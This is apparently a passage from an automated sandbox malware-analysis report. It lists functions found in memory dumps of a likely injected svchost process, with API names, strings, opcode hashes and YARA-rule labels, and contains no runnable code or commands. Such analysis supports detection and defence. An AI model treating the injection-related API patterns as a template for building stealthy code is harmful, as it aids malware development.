                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: 50e13fa17c3bf59197d400e801c98b0be272adff0d23520052f25ab3404dd5bc
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: 3F319021B12A40A3EE11DF46A80C76562DCB74AFA1F5D05259D1F6B790DF3DC849C392
                                                              Function 000002A661313DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: ff65df3e6d8c9de4419cb773b33199b337b810cada23280e1cd4933ea371c746
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: 8A116D32B14B8087E7509B52E84D31976B8F78AFE4F084224EA5F97794CF7CC8188781
                                                              Function 000002A661303790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: 025d1bc40c232432275dae4ecc1318edf57f0e1ebcf64f5229914e418f725714
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: F8115B76B04B8187EF149B62E40C66976B8FB8AF85F480029DE8E17794EF3DC609C705
                                                              Function 000002A661305B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction ID: 5f5900bbcb72c6ae03449aabeaeaebc51276a3d35255987f9de81e93377eb069
                                                              • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction Fuzzy Hash: 3BD1B836604B8882EA70DB0AE49835A77F4F389F85F144216EACE57BA5CF3DC545CB81
                                                              Function 000002A661302F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 0dbaea95a655bbe900e3289c597c93d81e3b199630ae2b61a37e5e2c9be7583f
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: AA31BF32B01B5183EA10DF66A64C76A67E8FB46FC5F0C40249E4A17B55EF3CC4A98381
                                                              Function 000002A66130CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: 0c3f37101a929da6b2ab2e1659a4edb589a4527edbf683f148d599b530f189ca
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: A4116020B0028443FA64A7315A5D72962DE6B86FF1F1C4724A937676D6DF6C84098783
                                                              Function 000002A66130199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: 471f3759c9f5d2bef42bfea3fd4cb3963e2dd95c959e6c4d1128e52080657580
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: C4015771B00A8083EA50DB92A85C35AA3A9F789FC5F884035DE8A63764DF7CC98DC741
                                                              Function 000002A6613036C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 79ca0cd446847db94c87b220a4133f292dc0ecc6b103301cedece9ec62c6ad04
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: B8011BB5B15B8087EB249B62E80D71972B8BB46F86F080424CA4A27754EF7DC50CC742
                                                              Function 000002A661309005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 077875c1ecc3ba653c40cf27df437926aa55189474758356bf14258b29207a20
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: AC517C32B0160087EB18DF15E84CB5937DAF346F99F198528DA5B63788EF79C849C782
                                                              Function 000002A661308FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: ba38e771323935cd7c4c993903e564a77b026bca2c24c40e091b995464114721
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 39315432B0064087E714DF12E84CB1977A9F386F89F0A8418EA5B23789DF79C948C786
                                                              Function 000002A661301A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: b1b7e669e6661b3feae12b7b33b5b685191a7800304716cf001d880ba287570f
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: 07F08C72B0468083FB208B60E88C35A63B9F749F88F888024DA4A57964DF6CC68DCB01
                                                              Function 000002A661303044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: cf77e8b58ec68dbf932fe7d168add0dfe5d0c02535d993d737ff7324a50749b0
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: 65F08CA0B04BC083EA008B93B90D119B2A9AB4AFC0F0C8430EE4B27B28DF7CC44D8701
                                                              Function 000002A66130BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: e21ae87d0ac0485e57b5ed7f78d9bcfc49820b6887902ab70198c3f652ea4012
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 24F06275B1164583EF108B64E84D3597368EB86F61F5C4619CA6B5B1E8CF6CC14DC341
                                                              Function 000002A6613050D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction ID: 9fa3ce34b8c865c90ad51e3620c2008df4696012e5c82a0db968548b5f0cb8e8
                                                              • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction Fuzzy Hash: 1002E832A19B8487EB60CB55F49835AB7E4F3C5B91F140015EA8E97BA8DF7DC488CB41
                                                              Function 000002A661305710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction ID: 94fa4eeebce64f2b49e1f32bc3357c48cfb3c794009292f3f2d6159d2374f774
                                                              • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction Fuzzy Hash: AE61F636A19B44C7E7608B15E44C31AB7E8F389B85F580115EA8E57BA8DF7CC548CF82
                                                              Function 000002A661314104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 66361736f5e8a90f3f2d0b71ac309b0d3cb3498acf01c0f7b7fefb88f4f0f5d8
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: F211A022F10A5123F6641568E95F369354C6B7BBBCF5C0634E977277E6CF2CC84A8202
                                                              Function 000002A6612E3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 22cd65d3b8f6dd6f7d9b94902791a143805ac03df98696b6fd4da49aabfe5191
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: F2118F22F10AD113FA649539F44D36911CD7B5FB76E4C8638A966073F68F2CCACD4202
                                                              Function 000002A6612DF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                              • API String ID: 3215553584-4202648911
                                                              • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction ID: 0bf1e752806efdf3d6918c8cb5621e3440e718aefe77ceb97043c9c5cc2f889e
                                                              • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction Fuzzy Hash: 80618E66F0024047FB658B75E54C32B66ADEB87F40F5D4519CA4A177A8DF3CC9CE820A
                                                              Function 000002A66130AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: af1233a52f56241061660763b27a88547fce862d6649db4ccb4df901e0d389cc
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 86614932B00B848AEB20DF65E44839D77E4F345B89F084215EE4A27BA8DF78C599C781
                                                              Function 000002A66130AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 71553aecd4e6c0be1a45bd4f8553e36c14cf70e2545c3f161416fa0a9a176b52
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 7F519272B002808BEB648F25A49C35977E8F356F86F1C4119DA8A67BE5CF7CD458C782
                                                              Function 000002A6612DA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 9e9e64640e33ee222bca170c8ee76b8c2aa3a2d202631a961c3e70975ee64d6a
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: CE515B32E042808BEBA48B26D44CB5877ADFB56F84F1C5116DA9987AE5CF7CD4D88702
                                                              Function 000002A6612D8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 8201e1b19b336b27b06942c19ab8646d026c506d3e7787226ca7cd4a84cb06ae
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 4751AF32F112008BEB14CB15E40CB59379DFB52F98F9AA124DA064378CEF38D9C89706
                                                              Function 000002A6612D83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: cefbc8a046af985220aa2329bd1f73024f30a7703efedaf0860a35be415e2574
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 94317A35B1168097E7149B21E84C75937ACFB42F88F5A9018EE5A03788DF3CC988D706
                                                              Function 000002A661312058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: daab32c25a9fadadc3e1a32652520a2a78c62dababe1d4e9fdec7867a8e6883d
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: 7AD1E332B14A808AE711CFB5D54939C3BB9F356B98F284215DE5AB7B99DF38C40AC341
                                                              Function 000002A6613014A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: 921e1a85b60784aa0bba0433d9b0249e05675eea00effd83e5fc34bb76f58227
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: D5118BB6A00AD0C7E714DFA2A80D25977B8F78AF85F084035EA4A23726DF7CC058C741
                                                              Function 000002A661312980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: f98e1d8c780189fb48322b240abb3135e65948d30303f15e17900ffbada13fd6
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: 85918E72B1065486FB609F75994E3AD3BA8B747F98F284109DE0B77694DF38C48AC702
                                                              Function 000002A661307960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: 1cc862d301829f27dd78957ba1fd8c5096fa0c01cbaac4e6f591e442f6dc95cb
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: 14111F32B10F418AEB409B60E8593A833B8F719B58F480D21DA6E57794DF7CC1988381
                                                              Function 000002A66130253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: a77167060b87a4fc452a4d9a47af32d2e27e7869f2a7b79b94de1e5e43e7598e
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 3571A436B0078147EA25DE35994C3AA67E8F386F95F580016DD0B63B89DF39C54DC782
                                                              Function 000002A6612D9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 4c1e01fd7d14f6ffb4a4eaa44a0f6dfd295677d667dd27de79d18e1f6fb3ebd9
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
